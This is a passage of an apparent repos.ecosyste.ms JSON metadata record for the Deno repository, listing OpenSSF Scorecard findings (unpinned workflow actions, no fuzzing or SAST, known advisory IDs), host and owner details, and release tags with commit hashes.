https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36975782,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/deno